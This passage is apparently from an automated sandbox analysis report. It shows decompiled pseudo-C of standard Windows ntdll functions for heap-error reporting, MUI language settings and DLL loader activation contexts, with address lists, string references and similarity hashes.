				_t115 =  *0x10d58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FEB150();
					} else {
						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00FEB150("Parameter2: %p\n",  *0x10d58a8);
				}
				_t117 =  *0x10d58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FEB150();
					} else {
						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00FEB150("Parameter3: %p\n",  *0x10d58ac);
				}
				_t119 =  *0x10d58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FEB150();
					} else {
						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x10d58b4);
					E00FEB150("Last known valid blocks: before - %p, after - %p\n",  *0x10d58b0);
				} else {
					_t120 =  *0x10d58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00FEB150();
				} else {
					E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E00FEB150("Stack trace available at %p\n", 0x10d58c0);
			}

0x010a1c10
0x010a1c16
0x010a1c1e
0x010a1c3d
0x010a1c3e
0x010a1c20
0x010a1c35
0x010a1c3a
0x010a1c44
0x010a1c55
0x010a1c5a
0x010a1c65
0x010a1c67
0x00000000
0x010a1c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x010a1c67
0x010a1cdc
0x010a1ce5
0x010a1d04
0x010a1d05
0x010a1ce7
0x010a1cfc
0x010a1d01
0x010a1d0b
0x010a1d17
0x010a1d1f
0x010a1d25
0x010a1d30
0x010a1d4f
0x010a1d50
0x010a1d32
0x010a1d47
0x010a1d4c
0x010a1d61
0x010a1d67
0x010a1d68
0x010a1d6e
0x010a1d79
0x010a1d98
0x010a1d99
0x010a1d7b
0x010a1d90
0x010a1d95
0x010a1daa
0x010a1db0
0x010a1db1
0x010a1db7
0x010a1dc2
0x010a1de1
0x010a1de2
0x010a1dc4
0x010a1dd9
0x010a1dde
0x010a1df3
0x010a1df9
0x010a1dfa
0x010a1e00
0x010a1e0a
0x010a1e13
0x010a1e32
0x010a1e33
0x010a1e15
0x010a1e2a
0x010a1e2f
0x010a1e39
0x010a1e4a
0x010a1e02
0x010a1e02
0x010a1e08
0x00000000
0x00000000
0x010a1e08
0x010a1e5b
0x010a1e7a
0x010a1e7b
0x010a1e5d
0x010a1e72
0x010a1e77
0x010a1e95

Strings

heap_failure_invalid_allocation_type, xrefs: 010A1CB4
heap_failure_listentry_corruption, xrefs: 010A1CD0
heap_failure_freelists_corruption, xrefs: 010A1CC9
heap_failure_generic, xrefs: 010A1C7C
heap_failure_buffer_overrun, xrefs: 010A1C98
heap_failure_lfh_bitmap_mismatch, xrefs: 010A1CD7
heap_failure_multiple_entries_corruption, xrefs: 010A1C8A
HEAP: , xrefs: 010A1C16, 010A1C3D, 010A1D04, 010A1D4F, 010A1D98, 010A1DE1, 010A1E32, 010A1E7A
heap_failure_unknown, xrefs: 010A1C75
heap_failure_cross_heap_operation, xrefs: 010A1CC2
heap_failure_entry_corruption, xrefs: 010A1C83
Heap error detected at %p (heap handle %p), xrefs: 010A1C50
Parameter3: %p, xrefs: 010A1DEE
heap_failure_usage_after_free, xrefs: 010A1CBB
Last known valid blocks: before - %p, after - %p, xrefs: 010A1E45
heap_failure_internal, xrefs: 010A1C6E
Error code: %d - %s, xrefs: 010A1D12
heap_failure_virtual_block_corruption, xrefs: 010A1C91
Parameter1: %p, xrefs: 010A1D5C
HEAP[%wZ]: , xrefs: 010A1C30, 010A1CF7, 010A1D42, 010A1D8B, 010A1DD4, 010A1E25, 010A1E6D
heap_failure_block_not_busy, xrefs: 010A1CA6
Stack trace available at %p, xrefs: 010A1E86
heap_failure_invalid_argument, xrefs: 010A1CAD
Parameter2: %p, xrefs: 010A1DA5
heap_failure_buffer_underrun, xrefs: 010A1C9F

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 7f62e3a7677f3e2dff62f09ea9661ac2898729fa00aa556d9cb78ef55597d745
Instruction ID: 386d647f9bf340cc0f79b20e3492c45b47a87ffbd384c7b80e8ec8992e690b61
Opcode Fuzzy Hash: 7f62e3a7677f3e2dff62f09ea9661ac2898729fa00aa556d9cb78ef55597d745
Instruction Fuzzy Hash: 3661B03651A185DFD311BBC9E896E2573A5EB04B70F4D807FF949AF352C63C9840AB0A

Uniqueness

Uniqueness Score: -1.00%

Function 00FF3D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00FF3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E00FF1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E00FF1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E00FF1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E00FF1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E00FF1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01004620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0102F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01031370(_t276, 0xfc4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0102BB40(0,  &_v68, _t170);
									if(L00FF43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0102BB40(_t257,  &_v68, _t243);
								if(L00FF43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01031370(_t278, 0xfc4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01004620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0102F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01031370(_v16, 0xfc4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0102BB40(_t262,  &_v68, _t244);
								if(L00FF43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01031370(_t282, 0xfc4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0102BB40(_t262,  &_v68, _t201);
							if(L00FF43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01004620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0102F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01031370(_t280, 0xfc4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0102BB40(_t267,  &_v68, _t245);
							if(L00FF43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01031370(_t284, 0xfc4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0102BB40(_t267,  &_v68, _t224);
						if(L00FF43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x00ff3d3c
0x00ff3d42
0x00ff3d44
0x00ff3d46
0x00ff3d49
0x00ff3d4c
0x00ff3d4f
0x00ff3d52
0x00ff3d55
0x00ff3d58
0x00ff3d5b
0x00ff3d5f
0x00ff3d61
0x00ff3d66
0x01048213
0x01048218
0x00ff4085
0x00ff4088
0x00ff408e
0x00ff4094
0x00ff409a
0x00ff40a0
0x00ff40a6
0x00ff40a9
0x00ff40af
0x00ff40b6
0x00ff40bd
0x00ff40bd
0x00ff3d83
0x0104821f
0x01048229
0x01048238
0x01048238
0x0104823d
0x0104823d
0x00ff3da0
0x00ff3daf
0x00ff3db5
0x00ff3dba
0x00ff3dba
0x00ff3dd4
0x00ff3e94
0x00ff3eab
0x00ff3f6d
0x00ff3f84
0x00ff406b
0x00ff406b
0x00ff406e
0x00ff406e
0x00ff4070
0x00ff4074
0x01048351
0x01048351
0x00ff407a
0x00ff407f
0x0104835d
0x01048370
0x01048377
0x01048379
0x0104837c
0x0104837c
0x0104835d
0x00000000
0x00ff407f
0x00ff3f8a
0x00ff3f8d
0x00ff3f90
0x00ff3f95
0x0104830d
0x0104830f
0x00ff3f9b
0x00ff3fac
0x00ff3fae
0x00ff3fb1
0x00ff3fb1
0x00ff3fb6
0x01048317
0x0104831a
0x00000000
0x00ff3fbc
0x00ff3fc1
0x00ff3fc9
0x00ff3fd7
0x00ff3fda
0x00ff3fdd
0x00ff4021
0x00ff4021
0x00ff4029
0x00ff4030
0x00ff4044
0x00ff4046
0x00ff4046
0x00ff4044
0x00ff4049
0x01048327
0x01048334
0x01048339
0x0104833c
0x00ff404f
0x00ff404f
0x00ff404f
0x00ff4051
0x00ff4056
0x00ff4063
0x00ff4063
0x00ff4068
0x00000000
0x00ff4068
0x00ff3fdf
0x00ff3fe2
0x00ff3fe4
0x00ff3fe7
0x00ff3fef
0x00ff4003
0x00ff4005
0x00ff4005
0x00ff400c
0x00ff4013
0x00ff4016
0x00ff4017
0x00ff401b
0x00ff401e
0x00000000
0x00ff401e
0x00ff3fb6
0x00ff3eb1
0x00ff3eb4
0x00ff3eb7
0x00ff3ebc
0x010482a9
0x010482ab
0x00ff3ec2
0x00ff3ed3
0x00ff3ed5
0x00ff3ed8
0x00ff3ed8
0x00ff3edd
0x010482b3
0x010482b6
0x00000000
0x00ff3ee3
0x00ff3ee8
0x00ff3eed
0x00ff3ef0
0x00ff3ef3
0x00ff3f02
0x00ff3f05
0x00ff3f08
0x010482c0
0x010482c3
0x010482c5
0x010482c8
0x010482d0
0x010482e4
0x010482e6
0x010482e6
0x010482ed
0x010482f4
0x010482f7
0x010482f8
0x010482fc
0x010482ff
0x010482ff
0x00ff3f0e
0x00ff3f11
0x00ff3f16
0x00ff3f1d
0x00ff3f31
0x01048307
0x01048307
0x00ff3f31
0x00ff3f39
0x00ff3f48
0x00ff3f4d
0x00ff3f50
0x00ff3f50
0x00ff3f53
0x00ff3f58
0x00ff3f65
0x00ff3f65
0x00ff3f6a
0x00000000
0x00ff3f6a
0x00ff3edd
0x00ff3dda
0x00ff3ddd
0x00ff3de0
0x00ff3de5
0x01048245
0x00ff3deb
0x00ff3df7
0x00ff3dfc
0x00ff3dfe
0x00ff3e01
0x00ff3e01
0x00ff3e06
0x0104824d
0x0104824f
0x01048254
0x00000000
0x00ff3e0c
0x00ff3e11
0x00ff3e16
0x00ff3e19
0x00ff3e29
0x00ff3e2c
0x00ff3e2f
0x0104825c
0x0104825f
0x01048261
0x01048264
0x0104826c
0x01048280
0x01048282
0x01048282
0x01048289
0x01048290
0x01048293
0x01048294
0x01048298
0x0104829b
0x0104829b
0x00ff3e35
0x00ff3e38
0x00ff3e3d
0x00ff3e44
0x00ff3e58
0x010482a3
0x010482a3
0x00ff3e58
0x00ff3e60
0x00ff3e6f
0x00ff3e74
0x00ff3e77
0x00ff3e77
0x00ff3e7a
0x00ff3e7f
0x00ff3e8c
0x00ff3e8c
0x00ff3e91
0x00000000
0x00ff3e91

Strings

WindowsExcludedProcs, xrefs: 00FF3D6F
Kernel-MUI-Language-SKU, xrefs: 00FF3F70
Kernel-MUI-Language-Disallowed, xrefs: 00FF3E97
Kernel-MUI-Number-Allowed, xrefs: 00FF3D8C
Kernel-MUI-Language-Allowed, xrefs: 00FF3DC0

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 7bcd747d3b62aa2f75bac80be247be58ce68ed77ea71b60fdf01942f0d3bfb32
Instruction ID: 59592607ab2095f4872ee66d0649f6aece3986748f00292c47ce0f1b97d3c131
Opcode Fuzzy Hash: 7bcd747d3b62aa2f75bac80be247be58ce68ed77ea71b60fdf01942f0d3bfb32
Instruction Fuzzy Hash: 1BF15DB2D00219EBCB15DF98C980AEEBBF9FF48750F14406AE645E7261D734AE01DB90

Uniqueness

Uniqueness Score: -1.00%

Function 01018E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01018E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x10dd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x10d8464; // 0x74b10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x10d5780 & 0x00000003) != 0) {
							E01065510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x10d5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0102B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x10d7984; // 0xb82c58
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x10d8464; // 0x74b10110
					 *0x10db1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01019B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x10d5780 & 0x00000005) != 0) {
						_push(_t49);
						E01065510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x01018e0f
0x01018e16
0x01018e19
0x01018e1b
0x01018e21
0x01018e7f
0x01018e85
0x01059354
0x0105936c
0x01059371
0x0105937b
0x01059381
0x01059381
0x0105937b
0x01018e9d
0x01018e9d
0x01018e29
0x01018e2c
0x01018e38
0x01018e3e
0x01018e43
0x01018eb5
0x01018eb9
0x010592aa
0x010592af
0x010592e8
0x010592e8
0x010592af
0x01018eb9
0x01018e45
0x01018e53
0x01018e5b
0x01018e5f
0x01018e78
0x01018e78
0x01018e7d
0x01018ec3
0x01018ecd
0x01018ed2
0x01018ed2
0x01018ec5
0x01018ec5
0x00000000
0x01018e7d
0x01018e67
0x01018ea4
0x0105931a
0x00000000
0x00000000
0x01059320
0x01018ea4
0x01018e70
0x01059325
0x01059340
0x01059345
0x01059345
0x01018e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0105932A
Querying the active activation context failed with status 0x%08lx, xrefs: 01059357
minkernel\ntdll\ldrsnap.c, xrefs: 0105933B, 01059367
LdrpFindDllActivationContext, xrefs: 01059331, 0105935D

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: d9cae984b4cc0b0ae58afc7058eb0b37a0e7bbfb67b2ffb17974915386f929a3
Instruction ID: bf6e8b670d3dce02e4afe05e7e438cb3b972545ec2925168cc7fe27021d82bd1
Opcode Fuzzy Hash: d9cae984b4cc0b0ae58afc7058eb0b37a0e7bbfb67b2ffb17974915386f929a3
Instruction Fuzzy Hash: 46411931A003119EDBB5AA1C8849B7A76F4BB01348F05C1ABEDC497599E7789E8083C1

Uniqueness

Uniqueness Score: -1.00%

Function 00FF8794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00FF8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E00FF934A() != 0) {
								_t159 = E0106A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x10d5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01065510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x10d5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E00FF849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E00FF8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E00FF8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x10d5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x10d5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01002280(_t92, 0x10d86cc);
															_t94 = E010B9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E010161A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x10d5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E00FF8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x10d5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x10d5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0102F380(_t136, 0xfc1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
